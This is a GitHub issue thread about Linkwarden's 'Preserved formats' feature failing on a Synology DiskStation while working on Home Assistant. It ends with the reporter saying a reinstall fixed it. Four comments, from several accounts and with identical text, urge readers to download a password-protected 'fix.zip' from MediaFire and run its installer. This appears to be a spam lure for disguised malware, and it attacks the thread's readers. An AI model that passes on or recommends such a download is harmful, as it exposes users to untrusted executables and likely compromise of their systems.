### ISSUE TITLE
2.7.1 “Preserved formats” does not work with Synology (but with Home Assistant)

### ISSUE THREAD

**Issue by marwenius** [linkwarden/linkwarden#741]
**Describe the bug**
I have installed Linkwarden on my Synology DiskStation DS220+ and the “Preserved formats” function does not work there.

However, it does work when I install Linkwarden on Home Assistant (Raspberry Pi) as a test.

Both devices are connected to the same router.

**To Reproduce**
1. Install Linkwarden on the DiskStation with the help of Portainer or install it as an add-on on Home Assistant.
2. Add the same link to both installations.
3. Click on “Preserved Formats” for both variants.
4. With Home Assistant it works and with DiskStation I only see “Link preservation is in the queue - Please check back later to see the result”.

**Expected behavior**
That the “Preserved Formats” also work with the DiskStation.

**Screenshots**
Home Assistant:
![grafik](https://github.com/user-attachments/assets/b4e67be2-5d00-45e4-b807-1259d79c4226)

DiskStation:
![grafik](https://github.com/user-attachments/assets/1bb4b75b-99b4-4c17-b470-4f63f1516eef)

The link in question:
[https://pimylifeup.com/raspberry-pi-linkwarden/](https://pimylifeup.com/raspberry-pi-linkwarden/)

**Desktop (please complete the following information):**
 - OS: Windows 10 Pro
 - Firefox
 - 129.0.2

**Additional context**
The script I used to deploy the stack: [linkwarden-portainer-synology-ds220p.yaml](https://github.com/marwenius/main/blob/main/linkwarden-portainer-synology-ds220p.yaml)

Because of Tailscale I had to use the option `network_mode: host`, otherwise Linkwarden could not access the database. Tailscale is also installed on the Home Assistant, but it worked there without adjusting the configuration.

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marwenius** [comment]
I completely reinstalled the whole thing and now it works without any problems. I have no idea what the problem was, as the procedure was the same.
